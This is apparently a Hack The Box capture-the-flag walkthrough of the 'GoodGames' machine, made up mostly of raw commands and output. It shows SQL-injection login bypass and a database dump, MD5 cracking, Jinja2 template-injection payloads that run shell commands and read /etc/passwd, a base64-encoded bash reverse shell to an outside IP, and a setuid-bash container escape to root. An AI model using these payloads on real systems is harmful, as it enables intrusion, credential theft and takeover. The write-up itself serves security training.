GoodGames
Wed, 18 September 2024
Platform: Hack The Box
Nmap scan report for 10.10.11.130
Host is up (0.043s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
Service Info: Host: goodgames.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.84 seconds
curl 10.10.11.130
<form action="/login" method="POST" class="nk-form text-white">
<div class="row vertical-gap">
<div class="col-md-12">
Use email and password:
<div class="nk-gap"></div>
<input type="email" value="" name="email" class=" form-control" placeholder="Email">
<div class="nk-gap"></div>
<input type="password" value="" name="password" class="required form-control" placeholder="Password">
</div>
</div>
<div class="nk-gap-1"></div>
<div class="row vertical-gap">
<div class="col-md-6">
<button type="submit" class="nk-btn nk-btn-rounded nk-btn-color-white nk-btn-block">Sign In</button>
</div>
<div class="col-md-6">
<div class="mnt-5">
<small><a href="/forgot-password">Forgot your password?</a></small>
</div>
<div class="mnt-5">
<small><a href="/signup">Not a member? Sign up</a></small>
</div>
</div>
</div>
</form>
sqlmap goodgames.htb --forms --crawl=2 -o --threads 10 --batch -T user --dump
Database: main
Table: user
[1 entry]
+----+---------------------+--------+----------------------------------+
| id | email | name | password |
+----+---------------------+--------+----------------------------------+
| 1 | admin@goodgames.htb | admin | 2b22337f218b2d82dfc3b6f77e7cb8ec |
+----+---------------------+--------+----------------------------------+
echo '2b22337f218b2d82dfc3b6f77e7cb8ec' | johnx rockyou
Loaded 1 password hash (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
superadministrator (?)
1g 0:00:00:00 DONE (2024-09-16 02:44) 4.545g/s 15799Kp/s 15799Kc/s 15799KC/s superant5564..super teengohan3
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
ffuf -u "http://goodgames.htb/login" -v \
-X POST -d "email=FUZZ&password=" \
-H "Content-Type: application/x-www-form-urlencoded" \
-w /usr/share/seclists/Fuzzing/Databases/sqli.auth.bypass.txt \
-mr 'Welcome|Success|Hello'y
[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 91ms]
| URL | http://goodgames.htb/login
* FUZZ: ' or 1=1#
[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 107ms]
| URL | http://goodgames.htb/login
* FUZZ: admin' or 1=1#
[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 125ms]
| URL | http://goodgames.htb/login
* FUZZ: admin' or '1'='1'#
[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 133ms]
| URL | http://goodgames.htb/login
* FUZZ: admin'or 1=1 or ''='
[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 125ms]
| URL | http://goodgames.htb/login
* FUZZ: root' or '1'='1'#
[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 124ms]
| URL | http://goodgames.htb/login
* FUZZ: root' or 1=1#
[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 129ms]
| URL | http://goodgames.htb/login
* FUZZ: root'or 1=1 or ''='
curl goodgames.htb/login -d "email=' or 1=1#&password=" -is | grep "Cookie:"
Set-Cookie: session=.eJw1yz0KgDAMBtC7fHMRXDN5E4kkjYX-QNNO4t3t4v7egzN29RsUObsGaOGUQWApqR7WmhgX9e0eFwKSgPaA3MxUUgWNPlearr0u9j-8Hz1GHgw.ZudwDg.4h9aY3Pg6jCweVgaTRXdjJ-F8tc; HttpOnly; Path=/
.eJw1yz0KgDAMBtC7fHMRXDN5E4kkjYX-QNNO4t3t4v7egzN29RsUObsGaOGUQWApqR7WmhgX9e0eFwKSgPaA3MxUUgWNPlearr0u9j-8Hz1GHgw.ZudwDg.4h9aY3Pg6jCweVgaTRXdjJ-F8tc
http://internal-administration.goodgames.htb/
sudo nano /etc/hosts
10.10.11.130 goodgames.htb internal-administration.goodgames.htb
http://internal-administration.goodgames.htb/login
<form method="post" action="" class="mt-4">
<input id="csrf_token" name="csrf_token" type="hidden" value="ImVmNzIwM2IwM2UwMTk4ZmZmN2Y2ZTFiMDFiNmYzMzE0ZmJhMzY2ZmMi.Zud2WQ.LJ2mw3T63Ulyzw5Jdh2GB_L7vDE">
<!-- Form -->
<div class="form-group mb-4">
<label for="email">Username</label>
<div class="input-group">
<span class="input-group-text" id="basic-addon1">
<span class="fas fa-user-circle"></span>
</span>
<input class="form-control" id="username_login" name="username" placeholder="Username" required type="text" value="">
</div>
</div>
<!-- End of Form -->
<div class="form-group">
<!-- Form -->
<div class="form-group mb-4">
<label for="password">Your Password</label>
<div class="input-group">
<span class="input-group-text" id="basic-addon2">
<span class="fas fa-unlock-alt"></span>
</span>
<input class="form-control" id="pwd_login" name="password" placeholder="Password" required type="password" value="">
</div>
</div>
<!-- End of Form -->
<div class="d-flex justify-content-between align-items-top mb-4">
<div class="form-check">
<input class="form-check-input" type="checkbox" value="" id="remember">
<label class="form-check-label mb-0" for="remember">
Remember me
</label>
</div>
</div>
</div>
<div class="d-grid">
<button type="submit" name="login" class="btn btn-gray-800">Sign In</button>
</div>
</form>
http://internal-administration.goodgames.htb/login
admin:superadministrator
POST /settings HTTP/1.1
Host: internal-administration.goodgames.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: http://internal-administration.goodgames.htb
Connection: close
Referer: http://internal-administration.goodgames.htb/settings
Cookie: session=.eJwlzjFqRDEMBNC7uE4h68uWtJdZJEsiIZDA_7tVyN3XITDNTDG8n3avM6_3dnucz3xr949ot4ZHrxmOUyuKyGNYL8zebTgJQ3jSwZIopDTLSwAVJrkiLZ0sejCMOlBL3MzTfaBqEY5JyYkUYMK2DMsFBNJWmO3PHcjeNuR55fmv-avrOuv--P7Mrz0Eu2C31EBIVxobxzHZZA1aG6MGI7i33xfrYT9Z.Zui01w.-0XWj6PT1xqznLIkLo4lL5HoTFw
Upgrade-Insecure-Requests: 1
Priority: u=0, i
name={{7*7}}
<h4 class="h3">
49
</h4>
<h5 class="fw-normal">
admin
</h5>
<p class="text-gray mb-4">
admin@goodgames.htb
</p>
SecLists/Fuzzing/template-engines-special-vars.txt
# JINJA2 (PYTHON)
# https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
# https://stackoverflow.com/a/40346872/451455
self._TemplateReference__context
POST /settings HTTP/1.1
Host: internal-administration.goodgames.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://internal-administration.goodgames.htb
Connection: close
Referer: http://internal-administration.goodgames.htb/settings
Cookie: session=.eJwlzjFqRDEMBNC7uE4h68uWtJdZJEsiIZDA_7tVyN3XITDNTDG8n3avM6_3dnucz3xr949ot4ZHrxmOUyuKyGNYL8zebTgJQ3jSwZIopDTLSwAVJrkiLZ0sejCMOlBL3MzTfaBqEY5JyYkUYMK2DMsFBNJWmO3PHcjeNuR55fmv-avrOuv--P7Mrz0Eu2C31EBIVxobxzHZZA1aG6MGI7i33xfrYT9Z.Zui01w.-0XWj6PT1xqznLIkLo4lL5HoTFw
Upgrade-Insecure-Requests: 1
Priority: u=0, i
name={{ self._TemplateReference__context }}
<h4 class="h3">
<Context {'namespace': <class 'jinja2.utils.Namespace'>,
'range': <class 'range'>,
'cycler': <class 'jinja2.utils.Cycler'>,
'get_flashed_messages': <function get_flashed_messages at 0x7f7f6faf6ae8>,
'config': <Config {'ENV': 'production',
'DEBUG': False,
'TESTING': False,
'PROPAGATE_EXCEPTIONS': None,
'PRESERVE_CONTEXT_ON_EXCEPTION': None,
'SECRET_KEY': 'S3cr3t_K#Key',
'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31),
'USE_X_SENDFILE': False,
'SERVER_NAME': None,
'APPLICATION_ROOT': '/',
'SESSION_COOKIE_NAME': 'session',
'SESSION_COOKIE_DOMAIN': False,
'SESSION_COOKIE_PATH': None,
'SESSION_COOKIE_HTTPONLY': True,
'SESSION_COOKIE_SECURE': False,
'SESSION_COOKIE_SAMESITE': None,
'SESSION_REFRESH_EACH_REQUEST': True,
'MAX_CONTENT_LENGTH': None,
'SEND_FILE_MAX_AGE_DEFAULT': None,
'TRAP_BAD_REQUEST_ERRORS': None,
'TRAP_HTTP_EXCEPTIONS': False,
'EXPLAIN_TEMPLATE_LOADING': False,
'PREFERRED_URL_SCHEME': 'http',
'JSON_AS_ASCII': True,
'JSON_SORT_KEYS': True,
'JSONIFY_PRETTYPRINT_REGULAR': False,
'JSONIFY_MIMETYPE': 'application/json',
'TEMPLATES_AUTO_RELOAD': None,
'MAX_COOKIE_SIZE': 4093,
'SQLALCHEMY_DATABASE_URI': 'sqlite:////backend/project/apps/db.sqlite3',
'SQLALCHEMY_TRACK_MODIFICATIONS': False,
'SQLALCHEMY_BINDS': None,
'SQLALCHEMY_NATIVE_UNICODE': None,
'SQLALCHEMY_ECHO': False,
'SQLALCHEMY_RECORD_QUERIES': None,
'SQLALCHEMY_POOL_SIZE': None,
'SQLALCHEMY_POOL_TIMEOUT': None,
'SQLALCHEMY_POOL_RECYCLE': None,
'SQLALCHEMY_MAX_OVERFLOW': None,
'SQLALCHEMY_COMMIT_ON_TEARDOWN': False,
'SQLALCHEMY_ENGINE_OPTIONS': {}}>,
'joiner': <class 'jinja2.utils.Joiner'>,
'session': <SecureCookieSession {'_fresh': True,
'_id': '231f6db269fdf44bd5a1f2e11a5b4870dbe4378e284946fbf8029064b924c967893705f329f8baabebb5299f42564e7e24d0a87aca2fb8080eacdaa4374370e1',
'_user_id': '1',
'csrf_token': 'd7b821ae9d20eb9451f27d67a8c54cf809a05d71'}>,
'g': <flask.g of 'apps'>,
'lipsum': <function generate_lorem_ipsum at 0x7f7f6ff2b488>,
'request': <Request 'http://localhost:8085/settings' [POST]>,
'url_for': <function url_for at 0x7f7f6faf68c8>,
'dict': <class 'dict'>,
'segment': 'settings',
'current_user': admin} of None>
</h4>
<h5 class="fw-normal">
admin
</h5>
<p class="text-gray mb-4">
admin@goodgames.htb
</p>
name={{namespace.__init__.__globals__.os.popen('id').read()}}
<h4 class="h3">
uid=0(root) gid=0(root) groups=0(root)
</h4>
<h5 class="fw-normal">
admin
</h5>
<p class="text-gray mb-4">
admin@goodgames.htb
</p>
name={{namespace.__init__.__globals__.os.popen('cat /etc/passwd').read()}}
<h4 class="h3">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
</h4>
<h5 class="fw-normal">
admin
</h5>
<p class="text-gray mb-4">
admin@goodgames.htb
</p>
bash -c "bash -i </dev/tcp/10.10.16.4/4435 >&0 2>&1"
echo 'bash -c "bash -i </dev/tcp/10.10.16.4/4435 >&0 2>&1"' | base64
YmFzaCAtYyAiYmFzaCAtaSA8L2Rldi90Y3AvMTAuMTAuMTYuNC80NDM1ID4mMCAyPiYxIgo=
name={{namespace.__init__.__globals__.os.popen('echo YmFzaCAtYyAiYmFzaCAtaSA8L2Rldi90Y3AvMTAuMTAuMTYuNC80NDM1ID4mMCAyPiYxIgo=|base64 -d|/bin/bash').read()}}
root@3a453ab39d3d:/backend# ls -la
ls -la
total 192
drwxr-xr-x 1 root root 4096 Sep 17 22:50 .
drwxr-xr-x 1 root root 4096 Nov 5 2021 ..
-rw-r--r-- 1 root root 122 Nov 3 2021 Dockerfile
-rw------- 1 root root 417792 Sep 17 22:42 core
drwxr-xr-x 1 root root 4096 Nov 3 2021 project
-rw-r--r-- 1 root root 208 Nov 3 2021 requirements.txt
root@3a453ab39d3d:/home# ls
augustus
root@3a453ab39d3d:/home/augustus# ls
user.txt
root@3a453ab39d3d:/home/augustus# cat user.txt
aa82ade36595a75ef784bf44f88a29f3
══╣ Breakout via mounts
═╣ /proc mounted? ................. Yes
═╣ release_agent breakout 1........ Yes
═╣ /proc/sched_debug readable ..... Yes
═╣ /sys/kernel/security present ... Yes
mount
/dev/sda1 on /home/augustus type ext4 (rw,relatime,errors=remount-ro)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro)
/dev/sda1 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro)
root@3a453ab39d3d:/backend# cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.19.0.2 3a453ab39d3d
for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from");done;
<(ping -c 1 172.19.0.${i} | grep "bytes from");done;
64 bytes from 172.19.0.1: icmp_seq=1 ttl=64 time=0.044 ms
64 bytes from 172.19.0.2: icmp_seq=1 ttl=64 time=0.021 ms
prefix=$(ip -o -f inet addr show eth0 | awk '{print $4}' | cut -d'.' -f1-3)
for i in {1..254}; do
if ping -c 1 172.19.0.${i} | grep "bytes from" > /dev/null; then
echo "Scanning 172.19.0.${i}..."
for port in {1..65535}; do
(echo >/dev/tcp/172.19.0.${i}/${port}) >/dev/null 2>&1 && echo "[open] ${port}"
done
fi
done
Scanning 172.19.0.1...
[open] 22
[open] 80
Scanning 172.19.0.2...
[open] 8085
[open] 53650
[open] 54516
root@3a453ab39d3d:/home/augustus# ssh augustus@172.19.0.1
The authenticity of host '172.19.0.1 (172.19.0.1)' can't be established.
ECDSA key fingerprint is SHA256:AvB4qtTxSVcB0PuHwoPV42/LAJ9TlyPVbd7G6Igzmj0.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '172.19.0.1' (ECDSA) to the list of known hosts.
augustus@172.19.0.1's password: superadministrator
Linux GoodGames 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
augustus@GoodGames:~$
augustus@GoodGames:~$ cp /bin/bash .
augustus@GoodGames:~$ exit
exit
logout
Connection to 172.19.0.1 closed.
root@3a453ab39d3d:/home/augustus# chown root:root bash
root@3a453ab39d3d:/home/augustus# chmod 4755 bash
root@3a453ab39d3d:/home/augustus# ls -la
total 1232
-rwsr-xr-x 1 root root 1234376 Sep 18 01:00 bash
root@3a453ab39d3d:~# ssh augustus@172.19.0.1
augustus@172.19.0.1's password: superadministrator
Linux GoodGames 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep 18 01:57:37 2024 from 172.19.0.2
augustus@GoodGames:~$ ./bash -p
bash-5.1# cat /root/root.txt
9b5af2bb2042fc72d6fc9c4e6c199bdb